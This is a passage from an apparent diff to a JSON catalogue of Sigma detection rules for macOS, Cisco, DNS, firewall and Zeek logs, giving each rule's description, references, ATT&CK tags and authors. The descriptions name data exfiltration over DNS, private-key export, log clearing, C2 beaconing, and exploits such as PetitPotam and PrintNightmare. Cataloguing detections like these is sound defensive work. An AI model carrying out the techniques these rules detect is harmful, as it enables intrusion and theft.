"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_shutdown_reboot.yml" + ], + "tags": [ + "attack.impact", + "attack.t1529" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_macos_system_shutdown_reboot.yml", + "author": "Igor Fits, Mikhail Larin, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.", + "uuid": "f68c4a4f-19ef-4817-952c-50dce331f4b0", + "value": "Potential WizardUpdate Malware Infection", + "meta": { + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97", + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", + "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml" + ], + "tags": [ + "attack.command_and_control" + ], + "creation_date": "2022/10/17", + "filename": "proc_creation_macos_wizardupdate_malware_infection.yml", + "author": "Tim Rauch (rule), Elastic (idea)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects macOS Gatekeeper bypass via xattr utility", + "uuid": 
"f5141b6d-9f42-41c6-a7bf-2a780678b29b", + "value": "Gatekeeper Bypass via Xattr", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.001/T1553.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.001" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_macos_xattr_gatekeeper_bypass.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.", + "uuid": "47d65ac0-c06f-4ba2-a2e3-d263139d0f51", + "value": "Potential XCSSET Malware Infection", + "meta": { + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08", + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xcsset_malware_infection.yml" + ], + "tags": [ + "attack.command_and_control" + ], + "creation_date": "2022/10/17", + "filename": "proc_creation_macos_xcsset_malware_infection.yml", + "author": "Tim Rauch (rule), Elastic (idea)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Clear command history in network OS which is used for defense evasion", + "uuid": "ceb407f6-8277-439b-951f-e4210e3ed956", + 
"value": "Cisco Clear Logs", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_clear_logs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ], + "creation_date": "2019/08/12", + "filename": "cisco_cli_clear_logs.yml", + "author": "Austin Clark", + "level": "high", + "falsepositive": [ + "Legitimate administrators may run these commands" + ], + "logsource.category": "accounting", + "logsource.product": "cisco" + } + }, + { + "description": "Collect pertinent data from the configuration files", + "uuid": "cd072b25-a418-4f98-8ebc-5093fb38fe1a", + "value": "Cisco Collect Data", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_collect_data.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.collection", + "attack.t1087.001", + "attack.t1552.001", + "attack.t1005" + ], + "creation_date": "2019/08/11", + "filename": "cisco_cli_collect_data.yml", + "author": "Austin Clark", + "level": "low", + "falsepositive": [ + "Commonly run by administrators" + ], + "logsource.category": "accounting", + "logsource.product": "cisco" + } + }, + { + "description": "Show when private keys are being exported from the device, or when new certificates are installed", + "uuid": "1f978c6a-4415-47fb-aca5-736a44d7ca3d", + "value": "Cisco Crypto Commands", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml" + ], + "tags": [ + "attack.credential_access", + "attack.defense_evasion", + "attack.t1553.004", + "attack.t1552.004" + ], + "creation_date": "2019/08/12", + "filename": "cisco_cli_crypto_actions.yml", + "author": "Austin Clark", + "level": "high", + "falsepositive": [ + "Not commonly run by administrators. 
Also whitelist your known good certificates" + ], + "logsource.category": "accounting", + "logsource.product": "cisco" + } + }, + { + "description": "Turn off logging locally or remote", + "uuid": "9e8f6035-88bf-4a63-96b6-b17c0508257e", + "value": "Cisco Disabling Logging", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_disable_logging.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2019/08/11", + "filename": "cisco_cli_disable_logging.yml", + "author": "Austin Clark", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "accounting", + "logsource.product": "cisco" + } + }, + { + "description": "Find information about network devices that is not stored in config files", + "uuid": "9705a6a1-6db6-4a16-a987-15b7151e299b", + "value": "Cisco Discovery", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083", + "attack.t1201", + "attack.t1057", + "attack.t1018", + "attack.t1082", + "attack.t1016", + "attack.t1049", + "attack.t1033", + "attack.t1124" + ], + "creation_date": "2019/08/12", + "filename": "cisco_cli_discovery.yml", + "author": "Austin Clark", + "level": "low", + "falsepositive": [ + "Commonly used by administrators for troubleshooting" + ], + "logsource.category": "accounting", + "logsource.product": "cisco" + } + }, + { + "description": "Detect a system being shutdown or put into different boot mode", + "uuid": "d94a35f0-7a29-45f6-90a0-80df6159967c", + "value": "Cisco Denial of Service", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_dos.yml" + ], + "tags": [ + "attack.impact", + "attack.t1495", + "attack.t1529", + "attack.t1565.001" + ], + "creation_date": "2019/08/15", + "filename": "cisco_cli_dos.yml", + "author": "Austin Clark", + "level": 
"medium", + "falsepositive": [ + "Legitimate administrators may run these commands, though rarely." + ], + "logsource.category": "accounting", + "logsource.product": "cisco" + } + }, + { + "description": "See what files are being deleted from flash file systems", + "uuid": "71d65515-c436-43c0-841b-236b1f32c21e", + "value": "Cisco File Deletion", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_file_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.impact", + "attack.t1070.004", + "attack.t1561.001", + "attack.t1561.002" + ], + "creation_date": "2019/08/12", + "filename": "cisco_cli_file_deletion.yml", + "author": "Austin Clark", + "level": "medium", + "falsepositive": [ + "Will be used sometimes by admins to clean up local flash space" + ], + "logsource.category": "accounting", + "logsource.product": "cisco" + } + }, + { + "description": "See what commands are being input into the device by other people, full credentials can be in the history", + "uuid": "b094d9fb-b1ad-4650-9f1a-fb7be9f1d34b", + "value": "Cisco Show Commands Input", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_input_capture.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.003" + ], + "creation_date": "2019/08/11", + "filename": "cisco_cli_input_capture.yml", + "author": "Austin Clark", + "level": "medium", + "falsepositive": [ + "Not commonly run by administrators, especially if remote logging is configured" + ], + "logsource.category": "accounting", + "logsource.product": "cisco" + } + }, + { + "description": "Find local accounts being created or modified as well as remote authentication configurations", + "uuid": "6d844f0f-1c18-41af-8f19-33e7654edfc3", + "value": "Cisco Local Accounts", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_local_accounts.yml" + ], + "tags": [ + 
"attack.persistence", + "attack.t1136.001", + "attack.t1098" + ], + "creation_date": "2019/08/12", + "filename": "cisco_cli_local_accounts.yml", + "author": "Austin Clark", + "level": "high", + "falsepositive": [ + "When remote authentication is in place, this should not change often" + ], + "logsource.category": "accounting", + "logsource.product": "cisco" + } + }, + { + "description": "Modifications to a config that will serve an adversary's impacts or persistence", + "uuid": "671ffc77-50a7-464f-9e3d-9ea2b493b26b", + "value": "Cisco Modify Configuration", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_modify_config.yml" + ], + "tags": [ + "attack.persistence", + "attack.impact", + "attack.t1490", + "attack.t1505", + "attack.t1565.002", + "attack.t1053" + ], + "creation_date": "2019/08/12", + "filename": "cisco_cli_modify_config.yml", + "author": "Austin Clark", + "level": "medium", + "falsepositive": [ + "Legitimate administrators may run these commands" + ], + "logsource.category": "accounting", + "logsource.product": "cisco" + } + }, + { + "description": "Various protocols maybe used to put data on the device for exfil or infil", + "uuid": "5e51acb2-bcbe-435b-99c6-0e3cd5e2aa59", + "value": "Cisco Stage Data", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_moving_data.yml" + ], + "tags": [ + "attack.collection", + "attack.lateral_movement", + "attack.command_and_control", + "attack.exfiltration", + "attack.t1074", + "attack.t1105", + "attack.t1560.001" + ], + "creation_date": "2019/08/12", + "filename": "cisco_cli_moving_data.yml", + "author": "Austin Clark", + "level": "low", + "falsepositive": [ + "Generally used to copy configs or IOS images" + ], + "logsource.category": "accounting", + "logsource.product": "cisco" + } + }, + { + "description": "Show when a monitor or a span/rspan is setup or modified", + "uuid": 
"b9e1f193-d236-4451-aaae-2f3d2102120d", + "value": "Cisco Sniffing", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_net_sniff.yml" + ], + "tags": [ + "attack.credential_access", + "attack.discovery", + "attack.t1040" + ], + "creation_date": "2019/08/11", + "filename": "cisco_cli_net_sniff.yml", + "author": "Austin Clark", + "level": "medium", + "falsepositive": [ + "Admins may setup new or modify old spans, or use a monitor for troubleshooting" + ], + "logsource.category": "accounting", + "logsource.product": "cisco" + } + }, + { + "description": "Normally, DNS logs contain a limited amount of different dns queries for a single domain. This rule detects a high amount of queries for a single domain, which can be an indicator that DNS is used to transfer data.", + "uuid": "1ec4b281-aa65-46a2-bdae-5fd830ed914e", + "value": "Possible DNS Tunneling", + "meta": { + "refs": [ + "https://zeltser.com/c2-dns-tunneling/", + "https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_c2_detection.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004", + "attack.exfiltration", + "attack.t1048.003" + ], + "creation_date": "2019/04/07", + "filename": "net_dns_c2_detection.yml", + "author": "Patrick Bareiss", + "level": "high", + "falsepositive": [ + "Valid software, which uses dns for transferring data" + ], + "logsource.category": "dns", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE", + "uuid": "aff715fa-4dd5-497a-8db3-910bea555566", + "value": "DNS Query to External Service Interaction Domains", + "meta": { + "refs": [ + "https://twitter.com/breakersall/status/1533493587828260866", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_external_service_interaction_domains.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.reconnaissance", + "attack.t1595.002" + ], + "creation_date": "2022/06/07", + "filename": "net_dns_external_service_interaction_domains.yml", + "author": "Florian Roth, Matt Kelly (list of domains)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "dns", + "logsource.product": "No established product" + } + }, + { + "description": "High DNS queries bytes amount from host per short period of time", + "uuid": "0f6c1bf5-70a5-4963-aef9-aab1eefb50bd", + "value": "High DNS Bytes Out", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_bytes_out.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ], + "creation_date": "2019/10/24", + "filename": "net_dns_high_bytes_out.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate high DNS bytes out rate to domain name which should be added to whitelist" + ], + "logsource.category": "dns", + "logsource.product": "No established product" + } + }, + { + "description": "Extremely high rate of NULL record type DNS requests from host per short period of time. 
Possible result of iodine tool execution", + "uuid": "44ae5117-9c44-40cf-9c7c-7edad385ca70", + "value": "High NULL Records Requests Rate", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_null_records_requests_rate.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2019/10/24", + "filename": "net_dns_high_null_records_requests_rate.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate high DNS NULL requests rate to domain name which should be added to whitelist" + ], + "logsource.category": "dns", + "logsource.product": "No established product" + } + }, + { + "description": "High DNS requests amount from host per short period of time", + "uuid": "b4163085-4001-46a3-a79a-55d8bbbc7a3a", + "value": "High DNS Requests Rate", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_requests_rate.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2019/10/24", + "filename": "net_dns_high_requests_rate.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate high DNS requests rate to domain name which should be added to whitelist" + ], + "logsource.category": "dns", + "logsource.product": "No established product" + } + }, + { + "description": "Extremely high rate of TXT record type DNS requests from host per short period of time. 
Possible result of Do-exfiltration tool execution", + "uuid": "f0a8cedc-1d22-4453-9c44-8d9f4ebd5d35", + "value": "High TXT Records Requests Rate", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_txt_records_requests_rate.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2019/10/24", + "filename": "net_dns_high_txt_records_requests_rate.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate high DNS TXT requests rate to domain name which should be added to whitelist" + ], + "logsource.category": "dns", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious DNS queries known from Cobalt Strike beacons", + "uuid": "2975af79-28c4-4d2f-a951-9095f229df29", + "value": "Cobalt Strike DNS Beaconing", + "meta": { + "refs": [ + "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", + "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_mal_cobaltstrike.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2018/05/10", + "filename": "net_dns_mal_cobaltstrike.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "dns", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious DNS queries to Monero mining pools", + "uuid": "b593fd50-7335-4682-a36c-4edcb68e4641", + "value": "Monero Crypto Coin Mining Pool Lookup", + "meta": { + "refs": [ + "https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml" + ], + "tags": [ + "attack.impact", + "attack.t1496", + 
"attack.t1567" + ], + "creation_date": "2021/10/24", + "filename": "net_dns_pua_cryptocoin_mining_xmr.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate crypto coin mining" + ], + "logsource.category": "dns", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious DNS queries using base64 encoding", + "uuid": "4153a907-2451-4e4f-a578-c52bb6881432", + "value": "Suspicious DNS Query with B64 Encoded String", + "meta": { + "refs": [ + "https://github.com/krmaxwell/dns-exfiltration", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_b64_queries.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2018/05/10", + "filename": "net_dns_susp_b64_queries.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "dns", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind", + "uuid": "c64c5175-5189-431b-a55e-6d9882158251", + "value": "Telegram Bot API Request", + "meta": { + "refs": [ + "https://core.telegram.org/bots/faq", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", + "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", + "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_telegram_api.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1102.002" + ], + "creation_date": "2018/06/05", + "filename": "net_dns_susp_telegram_api.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate 
use of Telegram bots in the company" + ], + "logsource.category": "dns", + "logsource.product": "No established product" + } + }, + { + "description": "Detects strings used in command execution in DNS TXT Answer", + "uuid": "8ae51330-899c-4641-8125-e39f2e07da72", + "value": "DNS TXT Answer with Possible Execution Strings", + "meta": { + "refs": [ + "https://twitter.com/stvemillertime/status/1024707932447854592", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_txt_exec_strings.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2018/08/08", + "filename": "net_dns_susp_txt_exec_strings.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "dns", + "logsource.product": "No established product" + } + }, + { + "description": "Detects wannacry killswitch domain dns queries", + "uuid": "3eaf6218-3bed-4d8a-8707-274096f12a18", + "value": "Wannacry Killswitch Domain", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/products-and-services/2017/05/wannacry-ransomware-campaign.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_wannacry_killswitch_domain.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2020/09/16", + "filename": "net_dns_wannacry_killswitch_domain.yml", + "author": "Mike Wade", + "level": "high", + "falsepositive": [ + "Analyst testing" + ], + "logsource.category": "dns", + "logsource.product": "No established product" + } + }, + { + "description": "Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools", + "uuid": "881834a4-6659-4773-821e-1c151789d873", + "value": "Equation Group C2 Communication", + "meta": { + "refs": [ + 
"https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation", + "https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_apt_equationgroup_c2.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.g0020", + "attack.t1041" + ], + "creation_date": "2017/04/15", + "filename": "net_firewall_apt_equationgroup_c2.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "firewall", + "logsource.product": "No established product" + } + }, + { + "description": "High DNS queries bytes amount from host per short period of time", + "uuid": "3b6e327d-8649-4102-993f-d25786481589", + "value": "High DNS Bytes Out - Firewall", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_high_dns_bytes_out.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ], + "creation_date": "2019/10/24", + "filename": "net_firewall_high_dns_bytes_out.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate high DNS bytes out rate to domain name which should be added to whitelist" + ], + "logsource.category": "firewall", + "logsource.product": "No established product" + } + }, + { + "description": "High DNS requests amount from host per short period of time", + "uuid": "51186749-7415-46be-90e5-6914865c825a", + "value": "High DNS Requests Rate - Firewall", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_high_dns_requests_rate.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2019/10/24", + "filename": "net_firewall_high_dns_requests_rate.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + 
"Legitimate high DNS requests rate to domain name which should be added to whitelist" + ], + "logsource.category": "firewall", + "logsource.product": "No established product" + } + }, + { + "description": "Detects many failed connection attempts to different ports or hosts", + "uuid": "4601eaec-6b45-4052-ad32-2d96d26ce0d8", + "value": "Network Scans Count By Destination IP", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_susp_network_scan_by_ip.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ], + "creation_date": "2017/02/19", + "filename": "net_firewall_susp_network_scan_by_ip.yml", + "author": "Thomas Patzke", + "level": "medium", + "falsepositive": [ + "Inventarization systems", + "Vulnerability scans" + ], + "logsource.category": "firewall", + "logsource.product": "No established product" + } + }, + { + "description": "Detects many failed connection attempts to different ports or hosts", + "uuid": "fab0ddf0-b8a9-4d70-91ce-a20547209afb", + "value": "Network Scans Count By Destination Port", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_susp_network_scan_by_port.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ], + "creation_date": "2017/02/19", + "filename": "net_firewall_susp_network_scan_by_port.yml", + "author": "Thomas Patzke", + "level": "medium", + "falsepositive": [ + "Inventarization systems", + "Vulnerability scans" + ], + "logsource.category": "firewall", + "logsource.product": "No established product" + } + }, + { + "description": "Domain user and group enumeration via network reconnaissance.\nSeen in APT 29 and other common tactics and actors. 
Detects a set of RPC (remote procedure calls) used to enumerate a domain controller.\nThe rule was created based off the datasets and hackathon from https://github.com/OTRF/detection-hackathon-apt29\n", + "uuid": "66a0bdc6-ee04-441a-9125-99d2eb547942", + "value": "Domain User Enumeration Network Recon 01", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29", + "https://github.com/OTRF/detection-hackathon-apt29/issues/37", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_domain_user_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002", + "attack.t1082" + ], + "creation_date": "2020/05/03", + "filename": "zeek_dce_rpc_domain_user_enumeration.yml", + "author": "Nate Guagenti (@neu5ron), Open Threat Research (OTR)", + "level": "medium", + "falsepositive": [ + "Devices that may do authentication like a VPN or a firewall that looksup IPs to username", + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Windows DCE-RPC functions which indicate an execution techniques on the remote system. 
All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE", + "uuid": "b640c0b8-87f8-4daa-aef8-95a24261dd1d", + "value": "MITRE BZAR Indicators for Execution", + "meta": { + "refs": [ + "https://github.com/mitre-attack/bzar#indicators-for-attck-execution", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.t1053.002", + "attack.t1569.002" + ], + "creation_date": "2020/03/19", + "filename": "zeek_dce_rpc_mitre_bzar_execution.yml", + "author": "@neu5ron, SOC Prime", + "level": "medium", + "falsepositive": [ + "Windows administrator tasks or troubleshooting", + "Windows management scripts or software" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Windows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.", + "uuid": "53389db6-ba46-48e3-a94c-e0f2cefe1583", + "value": "MITRE BZAR Indicators for Persistence", + "meta": { + "refs": [ + "https://github.com/mitre-attack/bzar#indicators-for-attck-persistence", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.004" + ], + "creation_date": "2020/03/19", + "filename": "zeek_dce_rpc_mitre_bzar_persistence.yml", + "author": "@neu5ron, SOC Prime", + "level": "medium", + "falsepositive": [ + "Windows administrator tasks or troubleshooting", + "Windows management scripts or software" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). 
Variations of this RPC are used within the attack refereed to as PetitPotam.\nThe usage of this RPC function should be rare if ever used at all.\nThus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate.\n View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..'\n", + "uuid": "4096842a-8f9f-4d36-92b4-d0b2a62f9b2a", + "value": "Potential PetitPotam Attack Via EFS RPC Calls", + "meta": { + "refs": [ + "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", + "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", + "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf", + "https://threatpost.com/microsoft-petitpotam-poc/168163/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml" + ], + "tags": [ + "attack.t1557.001", + "attack.t1187" + ], + "creation_date": "2021/08/17", + "filename": "zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml", + "author": "@neu5ron, @Antonlovesdnb, Mike Remen", + "level": "medium", + "falsepositive": [ + "Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description)." 
+ ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675).\nThe occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy.\n", + "uuid": "7b33baef-2a75-4ca3-9da4-34f9a15382d8", + "value": "Possible PrintNightmare Print Driver Install", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", + "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://github.com/corelight/CVE-2021-1675", + "https://old.zeek.org/zeekweek2019/slides/bzar.pdf", + "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml" + ], + "tags": [ + "attack.execution", + "cve.2021.1678", + "cve.2021.1675", + "cve.2021.34527" + ], + "creation_date": "2021/08/23", + "filename": "zeek_dce_rpc_printnightmare_print_driver_install.yml", + "author": "@neu5ron (Nate Guagenti)", + "level": "medium", + "falsepositive": [ + "Legitimate remote alteration of a printer driver." + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Detects the use of the spoolss named pipe over SMB. 
